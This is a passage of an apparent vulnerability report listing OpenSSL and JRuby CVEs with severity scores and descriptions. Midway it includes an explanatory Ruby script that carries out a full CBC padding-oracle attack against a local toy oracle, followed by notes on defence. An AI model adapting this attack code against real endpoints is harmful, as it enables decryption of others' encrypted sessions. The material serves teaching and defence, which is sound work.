CWE: CWE-200 Information Exposure

The AES-NI implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h does not consider memory allocation during a certain padding check, which allows remote attackers to obtain sensitive cleartext information via a padding-oracle attack against an AES CBC session. NOTE: this vulnerability exists because of an incorrect fix for CVE-2013-0169.

Vulnerable Software & Versions:

CVE-2016-2106  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Integer overflow in the EVP_EncryptUpdate function in crypto/evp/evp_enc.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of data.

Vulnerable Software & Versions:

CVE-2016-2105  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Integer overflow in the EVP_EncodeUpdate function in crypto/evp/encode.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of binary data.

Vulnerable Software & Versions:

CVE-2016-0704  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

An oracle protection mechanism in the get_client_master_key function in s2_srvr.c in the SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a overwrites incorrect MASTER-KEY bytes during use of export cipher suites, which makes it easier for remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, a related issue to CVE-2016-0800.

Vulnerable Software & Versions:

CVE-2016-0703  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

The get_client_master_key function in s2_srvr.c in the SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a accepts a nonzero CLIENT-MASTER-KEY CLEAR-KEY-LENGTH value for an arbitrary cipher, which allows man-in-the-middle attackers to determine the MASTER-KEY value and decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, a related issue to CVE-2016-0800.

Vulnerable Software & Versions:

CVE-2015-4000  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHello with DHE_EXPORT replaced by DHE, aka the "Logjam" issue.

Vulnerable Software & Versions:

CVE-2015-1792  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The do_free_upto function in crypto/cms/cms_smime.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (infinite loop) via vectors that trigger a NULL value of a BIO data structure, as demonstrated by an unrecognized X.660 OID for a hash function.

Vulnerable Software & Versions:

CVE-2015-1791  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Race condition in the ssl3_get_new_session_ticket function in ssl/s3_clnt.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b, when used for a multi-threaded client, allows remote attackers to cause a denial of service (double free and application crash) or possibly have unspecified other impact by providing a NewSessionTicket during an attempt to reuse a ticket that had been obtained earlier.

Vulnerable Software & Versions:

CVE-2015-1790  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The PKCS7_dataDecode function in crypto/pkcs7/pk7_doit.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a PKCS#7 blob that uses ASN.1 encoding and lacks inner EncryptedContent data.

Vulnerable Software & Versions:

CVE-2015-1789  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The X509_cmp_time function in crypto/x509/x509_vfy.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted length field in ASN1_TIME data, as demonstrated by an attack against a server that supports client authentication with a custom verification callback.

Vulnerable Software & Versions:

CVE-2015-1788  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The BN_GF2m_mod_inv function in crypto/bn/bn_gf2m.c in OpenSSL before 0.9.8s, 1.0.0 before 1.0.0e, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b does not properly handle ECParameters structures in which the curve is over a malformed binary polynomial field, which allows remote attackers to cause a denial of service (infinite loop) via a session that uses an Elliptic Curve algorithm, as demonstrated by an attack against a server that supports client authentication.

Vulnerable Software & Versions:

CVE-2015-1787  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The ssl3_get_client_key_exchange function in s3_srvr.c in OpenSSL 1.0.2 before 1.0.2a, when client authentication and an ephemeral Diffie-Hellman ciphersuite are enabled, allows remote attackers to cause a denial of service (daemon crash) via a ClientKeyExchange message with a length of zero.

Vulnerable Software & Versions:

CVE-2015-0293  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (s2_lib.c assertion failure and daemon exit) via a crafted CLIENT-MASTER-KEY message.

Vulnerable Software & Versions:

CVE-2015-0292  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

Integer underflow in the EVP_DecodeUpdate function in crypto/evp/encode.c in the base64-decoding implementation in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted base64 data that triggers a buffer overflow.

Vulnerable Software & Versions:

CVE-2015-0291  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The sigalgs implementation in t1_lib.c in OpenSSL 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) by using an invalid signature_algorithms extension in the ClientHello message during a renegotiation.

Vulnerable Software & Versions:

CVE-2015-0290  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-17 Code

The multi-block feature in the ssl3_write_bytes function in s3_pkt.c in OpenSSL 1.0.2 before 1.0.2a on 64-bit x86 platforms with AES NI support does not properly handle certain non-blocking I/O cases, which allows remote attackers to cause a denial of service (pointer corruption and application crash) via unspecified vectors.

Vulnerable Software & Versions:

CVE-2015-0289  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly handle a lack of outer ContentInfo, which allows attackers to cause a denial of service (NULL pointer dereference and application crash) by leveraging an application that processes arbitrary PKCS#7 data and providing malformed data with ASN.1 encoding, related to crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c.

Vulnerable Software & Versions:

CVE-2015-0288  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The X509_to_X509_REQ function in crypto/x509/x509_req.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow attackers to cause a denial of service (NULL pointer dereference and application crash) via an invalid certificate key.

Vulnerable Software & Versions:

CVE-2015-0287  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-17 Code

The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not reinitialize CHOICE and ADB data structures, which might allow attackers to cause a denial of service (invalid write operation and memory corruption) by leveraging an application that relies on ASN.1 structure reuse.

Vulnerable Software & Versions:

CVE-2015-0286  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-17 Code

The ASN1_TYPE_cmp function in crypto/asn1/a_type.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly perform boolean-type comparisons, which allows remote attackers to cause a denial of service (invalid read operation and application crash) via a crafted X.509 certificate to an endpoint that uses the certificate-verification feature.

Vulnerable Software & Versions:

CVE-2015-0285  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The ssl3_client_hello function in s3_clnt.c in OpenSSL 1.0.2 before 1.0.2a does not ensure that the PRNG is seeded before proceeding with a handshake, which makes it easier for remote attackers to defeat cryptographic protection mechanisms by sniffing the network and then conducting a brute-force attack.

Vulnerable Software & Versions:

CVE-2015-0209  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import.

Vulnerable Software & Versions:

CVE-2015-0208  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

The ASN.1 signature-verification implementation in the rsa_item_verify function in crypto/rsa/rsa_ameth.c in OpenSSL 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted RSA PSS parameters to an endpoint that uses the certificate-verification feature.

Vulnerable Software & Versions:

CVE-2015-0207  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The dtls1_listen function in d1_lib.c in OpenSSL 1.0.2 before 1.0.2a does not properly isolate the state information of independent data streams, which allows remote attackers to cause a denial of service (application crash) via crafted DTLS traffic, as demonstrated by DTLS 1.0 traffic to a DTLS 1.2 server.

Vulnerable Software & Versions:

CVE-2015-0204  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the "FREAK" issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations.

Vulnerable Software & Versions:

CVE-2014-8275  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c.

Vulnerable Software & Versions:

CVE-2014-8176  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The dtls1_clear_queues function in ssl/d1_lib.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h frees data structures without considering that application data can arrive between a ChangeCipherSpec message and a Finished message, which allows remote DTLS peers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unexpected application data.

Vulnerable Software & Versions:

CVE-2014-3572  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message.

Vulnerable Software & Versions:

CVE-2014-3571  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted DTLS message that is processed with a different read operation for the handshake header than for the handshake body, related to the dtls1_get_record function in d1_pkt.c and the ssl3_read_n function in s3_pkt.c.

Vulnerable Software & Versions:

CVE-2014-3570  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c.

Vulnerable Software & Versions:

CVE-2014-3568  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j does not properly enforce the no-ssl3 build option, which allows remote attackers to bypass intended access restrictions via an SSL 3.0 handshake, related to s23_clnt.c and s23_srvr.c.

Vulnerable Software & Versions:

CVE-2014-3567  

Severity: High
CVSS Score: 7.1 (AV:N/AC:M/Au:N/C:N/I:N/A:C)
CWE: CWE-399 Resource Management Errors

Memory leak in the tls_decrypt_ticket function in t1_lib.c in OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted session ticket that triggers an integrity-check failure.

Vulnerable Software & Versions:

CVE-2014-3566  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.

Vulnerable Software & Versions:

CVE-2014-3470  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value.

Vulnerable Software & Versions:

CVE-2014-0224  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the "CCS Injection" vulnerability.

Vulnerable Software & Versions:

CVE-2014-0221  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake.

Vulnerable Software & Versions:

CVE-2014-0195  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment.

Vulnerable Software & Versions:

CVE-2014-0076  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack.

Vulnerable Software & Versions:

CVE-2013-6449  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0.2 obtains a certain version number from an incorrect data structure, which allows remote attackers to cause a denial of service (daemon crash) via crafted traffic from a TLS 1.2 client.

Vulnerable Software & Versions:

CVE-2013-0169  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.

Vulnerable Software & Versions:

CVE-2012-5370  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

JRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.

Vulnerable Software & Versions:

CVE-2012-2333  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-189 Numeric Errors

Integer underflow in OpenSSL before 0.9.8x, 1.0.0 before 1.0.0j, and 1.0.1 before 1.0.1c, when TLS 1.1, TLS 1.2, or DTLS is used with CBC encryption, allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via a crafted TLS packet that is not properly handled during a certain explicit IV calculation.

Vulnerable Software & Versions:

CVE-2012-2110  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key.

Vulnerable Software & Versions:

CVE-2012-1165  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The mime_param_cmp function in crypto/asn1/asn_mime.c in OpenSSL before 0.9.8u and 1.x before 1.0.0h allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted S/MIME message, a different vulnerability than CVE-2006-7250.

Vulnerable Software & Versions:

CVE-2012-0884  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The implementation of Cryptographic Message Syntax (CMS) and PKCS #7 in OpenSSL before 0.9.8u and 1.x before 1.0.0h does not properly restrict certain oracle behavior, which makes it easier for context-dependent attackers to decrypt data via a Million Message Attack (MMA) adaptive chosen ciphertext attack.

Vulnerable Software & Versions:

CVE-2012-0027  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service (daemon crash) via crafted data from a TLS client.

Vulnerable Software & Versions:

CVE-2011-4838  

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.

Vulnerable Software & Versions:

CVE-2011-4619  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The Server Gated Cryptography (SGC) implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service (CPU consumption) via unspecified vectors.

Vulnerable Software & Versions:

CVE-2011-4577  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

OpenSSL before 0.9.8s and 1.x before 1.0.0f, when RFC 3779 support is enabled, allows remote attackers to cause a denial of service (assertion failure) via an X.509 certificate containing certificate-extension data associated with (1) IP address blocks or (2) Autonomous System (AS) identifiers.

Vulnerable Software & Versions:

CVE-2011-4576  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer.

Vulnerable Software & Versions:

CVE-2011-4354  

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

crypto/bn/bn_nist.c in OpenSSL before 0.9.8h on 32-bit platforms, as used in stunnel and other products, in certain circumstances involving ECDH or ECDHE cipher suites, uses an incorrect modular reduction algorithm in its implementation of the P-256 and P-384 NIST elliptic curves, which allows remote attackers to obtain the private key of a TLS server via multiple handshake attempts.

Vulnerable Software & Versions:

CVE-2011-4108  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack.

Vulnerable Software & Versions:
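CVE-2014-3566 (POODLE) and CVE-2011-4108 above both come down to a padding oracle: the peer reveals, through an error, a timing difference or a skipped MAC check, whether a CBC record decrypted to well-formed padding. The Ruby script below is an added illustration of that attack, not code from OpenSSL, JRuby or this report. `PaddingOracle` is a hypothetical server that leaks exactly that one bit for AES-128-CBC via Ruby's OpenSSL binding, and `recover_block`/`recover_plaintext` are the attacker side, which recovers the plaintext with no knowledge of the key using only that bit; all class and function names and the sample plaintext are constructed for the example.

```ruby
require 'openssl'
require 'securerandom'

BLOCK = 16

# Victim side (hypothetical server, constructed for this example): holds the
# key and answers a single question about a ciphertext, "did it decrypt to
# valid PKCS#7 padding?". That one bit is the oracle.
class PaddingOracle
  def initialize(key)
    @key = key
  end

  # Returns IV || ciphertext; OpenSSL applies PKCS#7 padding for us.
  def encrypt(plaintext)
    c = OpenSSL::Cipher.new('AES-128-CBC').encrypt
    c.key = @key
    iv = SecureRandom.random_bytes(BLOCK)
    c.iv = iv
    iv + c.update(plaintext) + c.final
  end

  # The leak: true if the padding was well-formed, false otherwise.
  def padding_valid?(iv, ciphertext)
    c = OpenSSL::Cipher.new('AES-128-CBC').decrypt
    c.key = @key
    c.iv = iv
    c.update(ciphertext) + c.final   # final raises on bad padding
    true
  rescue OpenSSL::Cipher::CipherError
    false
  end
end

# Attacker side: recover one plaintext block given the block before it.
# We feed the oracle a forged "IV" plus the target block, so the decrypted
# bytes are D_k(target) XOR forged, and learn D_k(target) byte by byte.
def recover_block(oracle, prev_block, target_block)
  intermediate = Array.new(BLOCK, 0)          # D_k(target_block)
  (BLOCK - 1).downto(0) do |pos|
    pad = BLOCK - pos                          # padding value we aim for
    forged = Array.new(BLOCK, 0)
    (pos + 1...BLOCK).each { |j| forged[j] = intermediate[j] ^ pad }
    found = false
    256.times do |guess|
      forged[pos] = guess
      next unless oracle.padding_valid?(forged.pack('C*'), target_block)
      if pos == BLOCK - 1
        # A hit on the last byte could be "\x02\x02" rather than "\x01";
        # disturbing the byte before it breaks the former but not the latter.
        check = forged.dup
        check[pos - 1] ^= 0xFF
        next unless oracle.padding_valid?(check.pack('C*'), target_block)
      end
      intermediate[pos] = guess ^ pad
      found = true
      break
    end
    raise 'oracle never accepted a padding for this byte' unless found
  end
  # plaintext = D_k(target) XOR previous ciphertext block (CBC chaining)
  intermediate.each_with_index.map { |b, j| b ^ prev_block.getbyte(j) }.pack('C*')
end

# Walk the whole message (IV || C1 || C2 ...) and strip the PKCS#7 padding.
def recover_plaintext(oracle, iv_and_ciphertext)
  blocks = iv_and_ciphertext.bytes.each_slice(BLOCK).map { |s| s.pack('C*') }
  padded = blocks.each_cons(2).map { |prev, cur| recover_block(oracle, prev, cur) }.join
  padded.byteslice(0, padded.bytesize - padded.getbyte(-1))
end

if $PROGRAM_NAME == __FILE__
  oracle = PaddingOracle.new(SecureRandom.random_bytes(BLOCK))
  sample = 'session=1f3a9c; role=admin'        # constructed sample plaintext
  puts recover_plaintext(oracle, oracle.encrypt(sample))
end
```

Each byte costs at most 256 oracle queries (about 128 on average), so the whole record falls in a few thousand requests, which is why an attacker who can replay or re-inject records (the man-in-the-middle position named for POODLE) needs nothing beyond this one bit. The defence is to make padding failure indistinguishable from MAC failure in both result and timing; CVE-2013-0169 (Lucky Thirteen) above shows that even a residual timing difference in that path is enough to rebuild the oracle.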

CVE-2011-1945  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The elliptic curve cryptography (ECC) subsystem in OpenSSL 1.0.0d and earlier, when the Elliptic Curve Digital Signature Algorithm (ECDSA) is used for the ECDHE_ECDSA cipher suite, does not properly implement curves over binary fields, which makes it easier for context-dependent attackers to determine private keys via a timing attack and a lattice calculation.

Vulnerable Software & Versions:

CVE-2011-1473  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

** DISPUTED ** OpenSSL before 0.9.8l, and 0.9.8m through 1.x, does not properly restrict client-initiated renegotiation within the SSL and TLS protocols, which might make it easier for remote attackers to cause a denial of service (CPU consumption) by performing many renegotiations within a single connection, a different vulnerability than CVE-2011-5094. NOTE: it can also be argued that it is the responsibility of server deployments, not a security library, to prevent or limit renegotiation when it is inappropriate within a specific environment.

Vulnerable Software & Versions:

CVE-2010-5298  

Severity: Medium
CVSS Score: 4.0 (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment.

Vulnerable Software & Versions:

CVE-2010-4252  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-287 Improper Authentication

OpenSSL before 1.0.0c, when J-PAKE is enabled, does not properly validate the public parameters in the J-PAKE protocol, which allows remote attackers to bypass the need for knowledge of the shared secret, and successfully authenticate, by sending crafted values in each round of the protocol.

Vulnerable Software & Versions:

CVE-2010-4180  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)

OpenSSL before 0.9.8q, and 1.0.x before 1.0.0c, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not properly prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the downgrade to an unintended cipher via vectors involving sniffing network traffic to discover a session identifier.

Vulnerable Software & Versions:

CVE-2010-1330  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

